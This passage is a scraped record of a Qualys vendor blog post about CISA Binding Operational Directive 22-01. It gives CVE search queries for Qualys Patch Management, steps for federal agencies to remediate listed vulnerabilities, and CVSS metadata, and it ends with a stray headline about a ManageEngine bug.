Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture6.jpg)\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n![](https://blog.qualys.com/wp-content/uploads/2021/11/Picture7.jpg)\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Critical ManageEngine Desktop Server Bug Opens Orgs to Malware

Description

Related